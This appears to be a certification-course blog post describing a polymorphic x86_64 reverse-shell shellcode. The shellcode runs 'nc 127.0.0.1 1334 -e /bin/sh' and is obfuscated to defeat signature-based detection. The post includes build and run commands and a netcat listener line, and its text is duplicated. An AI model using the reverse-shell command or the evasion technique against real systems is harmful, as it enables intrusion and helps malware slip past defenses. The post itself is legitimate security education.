This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification."
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE64-1434
Target Operating System: 64 bit Linux (x86_64 GNU/Linux)
This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html
The Original Version: http://shell-storm.org/shellcode/files/shellcode-823.php
Original Size: 109 bytes
My Version:
GitHub Link: https://github.com/rtaylor777/nasm/blob/master/PolyNetCatRevShell1434.nasm
Published: https://www.exploit-db.com/exploits/41510/
My version:
Number of bytes = 106
Number of nulls = 0
PolyNetCatRevShell1434.nasm
nc 127.0.0.1 1334 -e /bin/sh
I rewrote the original authors code and shrunk it's size down to 72 bytes. See: http://a41l4.blogspot.ca/2017/03/netcatrevshell1434.html
Then I rewrote that minimal size version to obfuscate what is happening a little which has bloated the code back up to 106 bytes. Overall this produces bytecode that would generate a different signature, and defeat signature based detection.
The 3 eight byte strings from my minimal version have been reversed, encoded in hex and placed at the beginning of the shellcode. Then a procedure at the label "handle" is called to load these 8 byte strings and push them onto the stack. It is worth noting that this design would permit further encrypting these 8 byte strings by putting the decryption steps in this handle procedure.
The last touch is to disguise the value that we are putting into RAX which would indicate the system call that we wish to make. Because the value manipulated is pulled from the stack you would have to rework this section of code if you wish to change the length of the IP address or Port strings that you are putting onto the stack.
wget https://raw.githubusercontent.com/rtaylor777/nasm/master/PolyNetCatRevShell1434.nasm
Assuming you have the NASM assembler ( http://www.nasm.us/ ):
Assemble:
nasm -felf64 PolyNetCatRevShell1434.nasm -o PolyNetCatRevShell1434.o
Link:
ld PolyNetCatRevShell1434.o -o PolyNetCatRevShell1434
Execute:
./PolyNetCatRevShell1434
But Wait
Before you run the shellcode you need to make sure that there is a client listening on port 1337, otherwise the shellcode will exit with an error that looks like this:
For this you can use the netcat command (nc, ncat):
nc -l -p 1337 127.0.0.1
Then I suggest you read over my NetCatRevShell1434 blog post: http://a41l4.blogspot.ca/2017/03/netcatrevshell1434.html since this polymorphic version is just an obfuscated version of that.
Shellcode.c
If you missed it from my previous blog posts the shellcode.c file is auto generated by my helper scripts. See: http://a41l4.blogspot.ca/2017/02/slae-helper-scripts.html
I felt it was worth mentioning that the original shellcode actually has a flaw. The author assumed that the value of RAX would be zero or at least constrained to the size of a byte. His only interaction with RAX was near the end where he executes:
mov al,59
So when running his shellcode in my shellcode.c file which pollutes all the main registers with 0xffffffffffffffff before calling the shellcode, it fails. I think this is important since I don't believe that there is any guarantee that RAX is in any particular state when injecting the shellcode into a process, via buffer overflow or what have you.
If you wish to learn more about assembly language, I highly recommend the "SecurityTube Linux Assembly Expert course and certification."
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE64-1434
Target Operating System: 64 bit Linux (x86_64 GNU/Linux)
This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html
The Original Version: http://shell-storm.org/shellcode/files/shellcode-823.php
Original Size: 109 bytes
My Version:
GitHub Link: https://github.com/rtaylor777/nasm/blob/master/PolyNetCatRevShell1434.nasm
Published: https://www.exploit-db.com/exploits/41510/
My version:
Number of bytes = 106
Number of nulls = 0
PolyNetCatRevShell1434.nasm
Intro
The PolyNetCatRevShell1434 does an execve system call to run the command:nc 127.0.0.1 1334 -e /bin/sh
Polymorphic
This is a polymorphic version of the original author's code which does basically the same thing.I rewrote the original authors code and shrunk it's size down to 72 bytes. See: http://a41l4.blogspot.ca/2017/03/netcatrevshell1434.html
Then I rewrote that minimal size version to obfuscate what is happening a little which has bloated the code back up to 106 bytes. Overall this produces bytecode that would generate a different signature, and defeat signature based detection.
The 3 eight byte strings from my minimal version have been reversed, encoded in hex and placed at the beginning of the shellcode. Then a procedure at the label "handle" is called to load these 8 byte strings and push them onto the stack. It is worth noting that this design would permit further encrypting these 8 byte strings by putting the decryption steps in this handle procedure.
The last touch is to disguise the value that we are putting into RAX which would indicate the system call that we wish to make. Because the value manipulated is pulled from the stack you would have to rework this section of code if you wish to change the length of the IP address or Port strings that you are putting onto the stack.
Testing
Download:wget https://raw.githubusercontent.com/rtaylor777/nasm/master/PolyNetCatRevShell1434.nasm
Assuming you have the NASM assembler ( http://www.nasm.us/ ):
Assemble:
nasm -felf64 PolyNetCatRevShell1434.nasm -o PolyNetCatRevShell1434.o
Link:
ld PolyNetCatRevShell1434.o -o PolyNetCatRevShell1434
Execute:
./PolyNetCatRevShell1434
But Wait
Before you run the shellcode you need to make sure that there is a client listening on port 1337, otherwise the shellcode will exit with an error that looks like this:
For this you can use the netcat command (nc, ncat):
nc -l -p 1337 127.0.0.1
Please See
If you are new to shellcode or shellcoding you should start by reading my blog post: http://a41l4.blogspot.ca/2017/01/execvestack1434.htmlThen I suggest you read over my NetCatRevShell1434 blog post: http://a41l4.blogspot.ca/2017/03/netcatrevshell1434.html since this polymorphic version is just an obfuscated version of that.
Shellcode.c
If you missed it from my previous blog posts the shellcode.c file is auto generated by my helper scripts. See: http://a41l4.blogspot.ca/2017/02/slae-helper-scripts.html
The Original Shellcode
http://shell-storm.org/shellcode/files/shellcode-823.phpI felt it was worth mentioning that the original shellcode actually has a flaw. The author assumed that the value of RAX would be zero or at least constrained to the size of a byte. His only interaction with RAX was near the end where he executes:
mov al,59
So when running his shellcode in my shellcode.c file which pollutes all the main registers with 0xffffffffffffffff before calling the shellcode, it fails. I think this is important since I don't believe that there is any guarantee that RAX is in any particular state when injecting the shellcode into a process, via buffer overflow or what have you.
Summary
The PolyNetCatRevShell1434 shellcode runs the netcat command to connect back to a client and then launch a /bin/sh shell for the client to interact with. Despite the efforts to make what this version of the shellcode is doing obscure, I have managed to reduce the size from the original authors shellcode by 3 bytes.If you wish to learn more about assembly language, I highly recommend the "SecurityTube Linux Assembly Expert course and certification."
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Comments
Post a Comment